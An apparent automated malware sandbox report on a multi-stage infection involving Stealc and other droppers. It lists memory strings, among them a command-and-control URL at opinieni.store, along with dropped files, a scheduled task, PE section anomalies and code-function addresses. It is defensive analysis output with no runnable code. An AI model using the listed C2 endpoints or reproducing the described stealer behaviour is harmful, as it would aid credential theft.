Source: d0d468f327.exe, 00000024.00000003.3212774952.000000000139D000.00000004.00000020.00020000.00000000.sdmp, d0d468f327.exe, 00000024.00000003.3181850438.00000000013A0000.00000004.00000020.00020000.00000000.sdmp, d0d468f327.exe, 00000024.00000003.3165998045.000000000139F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://opinieni.store/e
Source: d0d468f327.exe, 00000024.00000003.3860072459.0000000001370000.00000004.00000020.00020000.00000000.sdmp, d0d468f327.exe, 00000024.00000003.3860181129.0000000001373000.00000004.00000020.00020000.00000000.sdmp, d0d468f327.exe, 00000024.00000003.3859935758.000000000136E000.00000004.00000020.00020000.00000000.sdmp, d0d468f327.exe, 00000024.00000002.3869148594.0000000001374000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://opinieni.store/s1
Source: d0d468f327.exe, 00000024.00000003.3860117485.0000000001314000.00000004.00000020.00020000.00000000.sdmp, d0d468f327.exe, 00000024.00000003.3859535207.0000000001314000.00000004.00000020.00020000.00000000.sdmp, d0d468f327.exe, 00000024.00000002.3868990763.0000000001314000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://opinieni.store:443/api
Source: d0d468f327.exe, 00000024.00000003.3212872917.000000000137B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://opinieni.store:443/api/Mailbird
Source: d0d468f327.exe, 00000024.00000003.3860117485.0000000001314000.00000004.00000020.00020000.00000000.sdmp, d0d468f327.exe, 00000024.00000003.3859535207.0000000001314000.00000004.00000020.00020000.00000000.sdmp, d0d468f327.exe, 00000024.00000002.3868990763.0000000001314000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://opinieni.store:443/api0
Source: axplong.exe, 00000007.00000002.4561179734.00000000010C6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sectigo.com/CPS0
Source: gold.exe, 00000013.00000002.2806606580.0000000004788000.00000004.00000800.00020000.00000000.sdmp, gold.exe, 00000013.00000002.2806606580.0000000004595000.00000004.00000800.00020000.00000000.sdmp, gold.exe, 00000013.00000002.2817662633.0000000005D60000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
Source: gold.exe, 00000013.00000002.2806606580.0000000004788000.00000004.00000800.00020000.00000000.sdmp, gold.exe, 00000013.00000002.2774776253.0000000003571000.00000004.00000800.00020000.00000000.sdmp, gold.exe, 00000013.00000002.2806606580.0000000004595000.00000004.00000800.00020000.00000000.sdmp, gold.exe, 00000013.00000002.2817662633.0000000005D60000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/14436606/23354
Source: gold.exe, 00000013.00000002.2806606580.0000000004788000.00000004.00000800.00020000.00000000.sdmp, gold.exe, 00000013.00000002.2806606580.0000000004595000.00000004.00000800.00020000.00000000.sdmp, gold.exe, 00000013.00000002.2817662633.0000000005D60000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/2152978/23354
Source: d0d468f327.exe, 00000024.00000003.3217987511.0000000005E89000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: d0d468f327.exe, 00000024.00000003.3217987511.0000000005E89000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: stealc_default2.exe, 0000000E.00000003.2839188523.000000002D131000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL
Source: stealc_default2.exe, 0000000E.00000002.2910843085.0000000027030000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
Source: splwow64.exe, 0000001C.00000003.2937746757.0000000002921000.00000004.00000020.00020000.00000000.sdmp, Jurisdiction.pif, 00000029.00000003.3044061111.0000000003C3C000.00000004.00000800.00020000.00000000.sdmp, Jurisdiction.pif.29.dr	String found in binary or memory: https://www.autoitscript.com/autoit3/
Source: stealc_default2.exe, 0000000E.00000002.2910843085.0000000027030000.00000004.00000020.00020000.00000000.sdmp, d0d468f327.exe, 00000024.00000003.3223445453.0000000005BFB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
Source: stealc_default2.exe, 0000000E.00000002.2886105690.0000000000861000.00000004.00000020.00020000.00000000.sdmp, d0d468f327.exe, 00000024.00000003.3132758614.0000000005B96000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: Jurisdiction.pif.29.dr	String found in binary or memory: https://www.globalsign.com/repository/0
Source: splwow64.exe, 0000001C.00000003.2937746757.0000000002921000.00000004.00000020.00020000.00000000.sdmp, Jurisdiction.pif, 00000029.00000003.3044061111.0000000003C3C000.00000004.00000800.00020000.00000000.sdmp, Jurisdiction.pif.29.dr	String found in binary or memory: https://www.globalsign.com/repository/06
Source: d0d468f327.exe, 00000024.00000003.3132758614.0000000005B96000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: stealc_default2.exe, 0000000E.00000002.2886893072.0000000000CFA000.00000004.00000001.01000000.0000000B.sdmp	String found in binary or memory: https://www.mozilla.org/about/
Source: d0d468f327.exe, 00000024.00000003.3217987511.0000000005E89000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
Source: stealc_default2.exe, 0000000E.00000002.2886893072.0000000000CFA000.00000004.00000001.01000000.0000000B.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/
Source: d0d468f327.exe, 00000024.00000003.3217987511.0000000005E89000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
Source: stealc_default2.exe, 0000000E.00000002.2886893072.0000000000CFA000.00000004.00000001.01000000.0000000B.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: stealc_default2.exe, 0000000E.00000003.2839188523.000000002D131000.00000004.00000020.00020000.00000000.sdmp, d0d468f327.exe, 00000024.00000003.3217987511.0000000005E89000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: stealc_default2.exe, 0000000E.00000002.2886893072.0000000000CFA000.00000004.00000001.01000000.0000000B.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/ZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBM
Source: stealc_default2.exe, 0000000E.00000002.2886893072.0000000000CFA000.00000004.00000001.01000000.0000000B.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/lvYnwxfDB8MHxMYXN0UGFzc3xoZG9raWVqbnBpbWFrZWRoYWpoZGxj
Source: d0d468f327.exe, 00000024.00000003.3217987511.0000000005E89000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: stealc_default2.exe, 0000000E.00000003.2839188523.000000002D131000.00000004.00000020.00020000.00000000.sdmp, d0d468f327.exe, 00000024.00000003.3217987511.0000000005E89000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: stealc_default2.exe, 0000000E.00000002.2886893072.0000000000CFA000.00000004.00000001.01000000.0000000B.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: stealc_default2.exe, 0000000E.00000003.2839188523.000000002D131000.00000004.00000020.00020000.00000000.sdmp, d0d468f327.exe, 00000024.00000003.3217987511.0000000005E89000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\AppData\Local\Temp\Tmp5541.tmp			Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\AppData\Local\Temp\Tmp5552.tmp			Jump to dropped file

Spam, unwanted Advertisements and Ransom Demands

Reads the System eventlog

Source: C:\Users\user\AppData\Roaming\ofHIebp8us.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
Source: C:\Users\user\AppData\Roaming\Cd0bGrjt9g.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System

System Summary

Drops large PE files

Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe

File dump: service123.exe.21.dr 314617856

Jump to dropped file

PE file contains section with special chars

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:
Source: axplong.exe.0.dr	Static PE information: section name:
Source: axplong.exe.0.dr	Static PE information: section name: .idata
Source: axplong.exe.0.dr	Static PE information: section name:
Source: 03564c0e08.exe.7.dr	Static PE information: section name:
Source: 03564c0e08.exe.7.dr	Static PE information: section name: .rsrc
Source: 03564c0e08.exe.7.dr	Static PE information: section name: .idata
Source: random[1].exe0.7.dr	Static PE information: section name:
Source: random[1].exe0.7.dr	Static PE information: section name: .rsrc
Source: random[1].exe0.7.dr	Static PE information: section name: .idata
Source: d0d468f327.exe.7.dr	Static PE information: section name:
Source: d0d468f327.exe.7.dr	Static PE information: section name: .rsrc
Source: d0d468f327.exe.7.dr	Static PE information: section name: .idata
Source: gold[1].exe.7.dr	Static PE information: section name:
Source: gold[1].exe.7.dr	Static PE information: section name:
Source: gold[1].exe.7.dr	Static PE information: section name:
Source: gold.exe.7.dr	Static PE information: section name:
Source: gold.exe.7.dr	Static PE information: section name:
Source: gold.exe.7.dr	Static PE information: section name:
Source: random[1].exe1.7.dr	Static PE information: section name:
Source: random[1].exe1.7.dr	Static PE information: section name: .rsrc
Source: random[1].exe1.7.dr	Static PE information: section name: .idata
Source: random[1].exe1.7.dr	Static PE information: section name:
Source: 4ad48d7d65.exe.7.dr	Static PE information: section name:
Source: 4ad48d7d65.exe.7.dr	Static PE information: section name: .rsrc
Source: 4ad48d7d65.exe.7.dr	Static PE information: section name: .idata
Source: 4ad48d7d65.exe.7.dr	Static PE information: section name:
Source: random[1].exe2.7.dr	Static PE information: section name:
Source: random[1].exe2.7.dr	Static PE information: section name: .rsrc
Source: random[1].exe2.7.dr	Static PE information: section name: .idata
Source: 25e6c25320.exe.7.dr	Static PE information: section name:
Source: 25e6c25320.exe.7.dr	Static PE information: section name: .rsrc
Source: 25e6c25320.exe.7.dr	Static PE information: section name: .idata
Source: 84d15ff2c9.exe.7.dr	Static PE information: section name:
Source: 84d15ff2c9.exe.7.dr	Static PE information: section name: .rsrc
Source: 84d15ff2c9.exe.7.dr	Static PE information: section name: .idata
Source: 84d15ff2c9.exe.7.dr	Static PE information: section name:

PE file has a writeable .text section

Source: stealc_default2[1].exe.7.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: stealc_default2.exe.7.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 14_2_6BAAF280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,	14_2_6BAAF280
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 14_2_6BB0B910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError,	14_2_6BB0B910
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 14_2_6BB0B8C0 rand_s,NtQueryVirtualMemory,	14_2_6BB0B8C0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 14_2_6BB0B700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,	14_2_6BB0B700

Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\Tasks\axplong.job	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe	File created: C:\Windows\SysWOW64\static.lib	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	File created: C:\Windows\LuggageRepresentations
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	File created: C:\Windows\AdditionsSalvation
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	File created: C:\Windows\SixCream
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	File created: C:\Windows\HomelessLaser
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	File created: C:\Windows\ActuallyFtp
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	File created: C:\Windows\EauOfficial

Source: C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe

File deleted: C:\Windows\SysWOW64\static.lib

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 7_2_002A3068	7_2_002A3068
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 7_2_00264CF0	7_2_00264CF0
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 7_2_00297D83	7_2_00297D83
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 7_2_002A765B	7_2_002A765B
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 7_2_00264AF0	7_2_00264AF0
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 7_2_002A8720	7_2_002A8720
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 7_2_002A6F09	7_2_002A6F09
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 7_2_002A777B	7_2_002A777B
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 7_2_002A2BD0	7_2_002A2BD0
Source: C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe	Code function: 8_2_00250080	8_2_00250080
Source: C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe	Code function: 8_2_00288131	8_2_00288131
Source: C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe	Code function: 8_2_0027E108	8_2_0027E108
Source: C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe	Code function: 8_2_0025D253	8_2_0025D253
Source: C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe	Code function: 8_2_0028C2DB	8_2_0028C2DB
Source: C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe	Code function: 8_2_00273318	8_2_00273318
Source: C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe	Code function: 8_2_0027B3A7	8_2_0027B3A7
Source: C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe	Code function: 8_2_0024E471	8_2_0024E471
Source: C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe	Code function: 8_2_00258484	8_2_00258484
Source: C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe	Code function: 8_2_002734D8	8_2_002734D8
Source: C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe	Code function: 8_2_00270738	8_2_00270738
Source: C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe	Code function: 8_2_0024E7B9	8_2_0024E7B9
Source: C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe	Code function: 8_2_0028E888	8_2_0028E888
Source: C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe	Code function: 8_2_00287933	8_2_00287933
Source: C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe	Code function: 8_2_00244A64	8_2_00244A64
Source: C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe	Code function: 8_2_00254A73	8_2_00254A73
Source: C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe	Code function: 8_2_00283A4D	8_2_00283A4D
Source: C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe	Code function: 8_2_00246D4D	8_2_00246D4D
Source: C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe	Code function: 8_2_0025EDD6	8_2_0025EDD6
Source: C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe	Code function: 9_2_00250080	9_2_00250080
Source: C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe	Code function: 9_2_00244A64	9_2_00244A64
Source: C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe	Code function: 9_2_00254A73	9_2_00254A73
Source: C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe	Code function: 9_2_0025D253	9_2_0025D253
Source: C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe	Code function: 9_2_0024E471	9_2_0024E471
Source: C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe	Code function: 9_2_00258484	9_2_00258484
Source: C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe	Code function: 9_2_00246D4D	9_2_00246D4D
Source: C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe	Code function: 9_2_0025EDD6	9_2_0025EDD6
Source: C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe	Code function: 9_2_0024E7B9	9_2_0024E7B9
Source: C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe	Code function: 10_2_00402320	10_2_00402320
Source: C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe	Code function: 10_2_004050C0	10_2_004050C0
Source: C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe	Code function: 10_2_00420470	10_2_00420470
Source: C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe	Code function: 10_2_0040FCF0	10_2_0040FCF0
Source: C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe	Code function: 10_2_00419D19	10_2_00419D19
Source: C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe	Code function: 10_2_0041951B	10_2_0041951B
Source: C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe	Code function: 10_2_00415635	10_2_00415635
Source: C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe	Code function: 10_2_0041DEC3	10_2_0041DEC3
Source: C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe	Code function: 10_2_00404F00	10_2_00404F00
Source: C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe	Code function: 10_2_0040CF8F	10_2_0040CF8F
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 14_2_6BAA35A0	14_2_6BAA35A0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 14_2_6BAAF380	14_2_6BAAF380
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 14_2_6BB153C8	14_2_6BB153C8
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 14_2_6BAED320	14_2_6BAED320
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 14_2_6BABC370	14_2_6BABC370
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 14_2_6BAA5340	14_2_6BAA5340
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 14_2_6BB12AB0	14_2_6BB12AB0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 14_2_6BAA22A0	14_2_6BAA22A0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 14_2_6BAD4AA0	14_2_6BAD4AA0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 14_2_6BABCAB0	14_2_6BABCAB0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 14_2_6BB1BA90	14_2_6BB1BA90
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 14_2_6BAC1AF0	14_2_6BAC1AF0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 14_2_6BAEE2F0	14_2_6BAEE2F0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 14_2_6BAE8AC0	14_2_6BAE8AC0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 14_2_6BAE9A60	14_2_6BAE9A60
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 14_2_6BAAC9A0	14_2_6BAAC9A0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 14_2_6BADD9B0	14_2_6BADD9B0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 14_2_6BB02990	14_2_6BB02990
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 14_2_6BAE5190	14_2_6BAE5190
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 14_2_6BB1B170	14_2_6BB1B170
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 14_2_6BABD960	14_2_6BABD960
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 14_2_6BAFB970	14_2_6BAFB970
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 14_2_6BACA940	14_2_6BACA940
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 14_2_6BAD60A0	14_2_6BAD60A0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 14_2_6BACC0E0	14_2_6BACC0E0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 14_2_6BAE58E0	14_2_6BAE58E0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 14_2_6BB150C7	14_2_6BB150C7
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 14_2_6BAEB820	14_2_6BAEB820
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 14_2_6BAF4820	14_2_6BAF4820
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 14_2_6BAB7810	14_2_6BAB7810
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 14_2_6BAEF070	14_2_6BAEF070
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 14_2_6BAC8850	14_2_6BAC8850
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 14_2_6BACD850	14_2_6BACD850
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 14_2_6BAF77A0	14_2_6BAF77A0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 14_2_6BAADFE0	14_2_6BAADFE0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 14_2_6BAD6FF0	14_2_6BAD6FF0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 14_2_6BAB9F00	14_2_6BAB9F00
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 14_2_6BAE7710	14_2_6BAE7710
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 14_2_6BB04EA0	14_2_6BB04EA0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 14_2_6BB0E680	14_2_6BB0E680
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 14_2_6BAC5E90	14_2_6BAC5E90
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 14_2_6BB176E3	14_2_6BB176E3
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 14_2_6BAABEF0	14_2_6BAABEF0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 14_2_6BABFEF0	14_2_6BABFEF0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 14_2_6BB09E30	14_2_6BB09E30
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 14_2_6BAF5600	14_2_6BAF5600
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 14_2_6BAE7E10	14_2_6BAE7E10
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 14_2_6BB16E63	14_2_6BB16E63
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 14_2_6BAAC670	14_2_6BAAC670
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 14_2_6BAF2E4E	14_2_6BAF2E4E
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 14_2_6BAC4640	14_2_6BAC4640
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 14_2_6BAC9E50	14_2_6BAC9E50
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 14_2_6BAE3E50	14_2_6BAE3E50
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 14_2_6BB085F0	14_2_6BB085F0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 14_2_6BAE0DD0	14_2_6BAE0DD0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 14_2_6BABFD00	14_2_6BABFD00
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 14_2_6BACED10	14_2_6BACED10
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 14_2_6BAD0512	14_2_6BAD0512
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 14_2_6BB034A0	14_2_6BB034A0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 14_2_6BB0C4A0	14_2_6BB0C4A0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 14_2_6BAB6C80	14_2_6BAB6C80
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 14_2_6BAAD4E0	14_2_6BAAD4E0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 14_2_6BAE6CF0	14_2_6BAE6CF0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 14_2_6BAB64C0	14_2_6BAB64C0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 14_2_6BACD4D0	14_2_6BACD4D0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 14_2_6BB1542B	14_2_6BB1542B
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 14_2_6BB1AC00	14_2_6BB1AC00
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 14_2_6BAE5C10	14_2_6BAE5C10
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 14_2_6BAF2C10	14_2_6BAF2C10
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 14_2_6BAB5440	14_2_6BAB5440
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 14_2_6BB1545C	14_2_6BB1545C

Source: C:\Users\user\AppData\Roaming\ofHIebp8us.exe

Process token adjusted: Security

Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: String function: 6BADCBE8 appears 134 times
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: String function: 00CA45C0 appears 316 times
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: String function: 6BAE94D0 appears 90 times
Source: C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe	Code function: String function: 00407D30 appears 55 times
Source: C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe	Code function: String function: 0024F548 appears 46 times
Source: C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe	Code function: String function: 00247620 appears 108 times
Source: C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe	Code function: String function: 002553F1 appears 34 times
Source: C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe	Code function: String function: 00276148 appears 55 times

Source: C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6128 -s 312

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: random[1].exe.7.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
